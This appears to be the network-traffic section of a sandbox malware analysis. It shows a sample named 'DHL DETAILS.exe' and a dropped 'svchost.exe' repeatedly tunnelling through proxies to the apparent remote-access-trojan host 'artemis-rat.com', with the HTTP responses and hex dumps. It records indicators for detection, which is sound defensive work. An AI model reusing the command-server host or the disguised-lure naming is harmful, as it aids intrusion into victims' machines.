                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1565192.168.2.554785172.67.182.153806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.713591099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.869728088 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1566192.168.2.554786104.19.235.10806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.714518070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.870949984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1567192.168.2.55466874.119.147.20941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.714663029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1568192.168.2.55479145.12.31.104806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.715928078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.872205019 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1569192.168.2.554794104.23.100.73806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.717097998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.873426914 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1570192.168.2.554706172.93.213.177806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.727531910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1571192.168.2.554636222.124.29.5956786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.727534056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1572192.168.2.55451047.91.104.8831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.727799892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1573192.168.2.55377268.71.247.13041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.743015051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1574192.168.2.55457294.131.60.1995837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.790220976 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1575192.168.2.55404292.204.136.149186296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.827476978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1576192.168.2.554530123.241.210.123806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.837739944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1577192.168.2.554827104.27.26.29806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838006020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.993756056 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1578192.168.2.554841172.67.181.37806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838368893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.993810892 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1579192.168.2.55471194.131.107.4510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838537931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.536488056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1580192.168.2.550230177.234.194.1559996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838570118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.492800951 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1581192.168.2.554727203.222.24.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838640928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1582192.168.2.5546885.252.23.22010816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838813066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1583192.168.2.554875104.19.124.112806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838814974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.994204044 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1584192.168.2.554877172.64.152.98806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838854074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.994440079 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1585192.168.2.55389281.199.14.4910886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838933945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1586192.168.2.554734218.252.244.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.838995934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.142115116 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
